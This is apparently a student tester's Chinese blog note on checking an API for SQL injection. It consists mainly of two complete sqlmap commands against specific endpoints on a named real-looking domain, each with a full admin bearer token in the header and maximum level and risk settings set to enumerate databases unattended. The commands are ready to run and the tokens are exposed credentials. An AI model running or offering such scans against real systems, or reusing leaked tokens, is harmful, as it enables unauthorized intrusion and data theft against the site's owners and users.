sqlmap工具查询接口是否存在sql注入

转：https://blog.csdn.net/m0_63641882/article/details/134529081

sqlmap -u 'https://orgvue3.cyberwing.cn/api/org/tree/unitTree?id=0&_t=1725517383534' --header 'Authorization: Bearer eyJraWQiOiI2MGMyY2RiNC03N2NlLTQzYzMtOTdiNS0xNmE1YjVlMDhlYzAiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbnVzZXJkZXB0aWQiLCJhdWQiOiJvYXV0aDJzZXJ2ZXIiLCJuYmYiOjE3MjU1MTU0ODMsInVzZXJfbmFtZSI6ImFkbWluIiwiaXNzIjoiaHR0cDpcL1wvYXV0aC1zZXJ2ZXI6ODA4NiIsImV4cCI6MTcyNTUxOTA4MywiaWF0IjoxNzI1NTE1NDgzLCJ1c2VyZGVwdElkIjoiYWRtaW51c2VyZGVwdGlkIn0.P-RMGp7R8uBpio0iRSmgsc4kN0lwyHjZ7z5hcxBwBA6aH0soJkaFGb09TsJ3SeUKCJF2UhPxSeEXF1y2Dn2x0S5nQ4hlJ6Nw85KHu5gzdAf03tCyLrLo6WqEgzhZWToBFe1nlhWg-7BsxWI75fVoWEOh1g1ySVRtk1urT6ifUNs3zyIilMpX8oncTnM3fvG4R7QGnLGz8Hao15cTHg6eZAtS-8c8NwK3GO6EH2Law9Mv8f9vtPwJVR_sscAz891DDLng7JOZpexmU9Dqgtan-JrM51d7QaMrruF-Tk65wFqJogBaXEtsWDNviQB04dfhhILsnizgJ4XhNRquNh9wtg' --random-agent --level=5 --risk=3 --batch --dbs

sqlmap -u 'https://orgvue3.cyberwing.cn/api/org/QueryUserService/pageUserList?unitId=10000&id=10000&subOrgId=10000' --header 'Authorization: Bearer eyJraWQiOiI2MGMyY2RiNC03N2NlLTQzYzMtOTdiNS0xNmE1YjVlMDhlYzAiLCJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhZG1pbnVzZXJkZXB0aWQiLCJhdWQiOiJvYXV0aDJzZXJ2ZXIiLCJuYmYiOjE3MjU1MTc3ODksInVzZXJfbmFtZSI6ImFkbWluIiwiaXNzIjoiaHR0cDpcL1wvYXV0aC1zZXJ2ZXI6ODA4NiIsImV4cCI6MTcyNTUyMTM4OSwibG9jYWxlIjoiemgtY24iLCJpYXQiOjE3MjU1MTc3ODksInVzZXJkZXB0SWQiOiJhZG1pbnVzZXJkZXB0aWQifQ.CI6lTpT-b3J8LbR0iPaFiy5fI51eqcduVxdtePNM9Pka8G1o_G4jycr6D87nCw2bP8K1a6PK6FTCi1-WOc4elJPaYvFqn3o8VNaJ7GQUjc0A80tq1Xclk0xSstkjeRr0mieWeu3m-J5l6jewfoDOjUPTOP2bjtd-jAK2KEpne95IImqGorVyeag3nSqrionRAxa38Dswcwd6e5tXo2y2Iz0V87ixYF72XSl-XAoxyRw0E-qMYh8aGsX6U8lt-1P7_1poUgaON7Xb0Va1zqDQCahoYSfKVMfUa-dbmICn-Zbm2TAFE2XNSjRWPouz06khPaMlkeEfkL1bAeBYQ5aEMA' --random-agent -level=5 --risk=3 --batch --dbs

posted @ 2024-09-05 16:15 测试艺术家阅读(40) 评论(0) 编辑收藏举报

刷新页面返回顶部

丝瓜鞋

作者为软件测试学员，日常学习的一些笔记，仅便于自己查看。

sqlmap工具查询接口是否存在sql注入

公告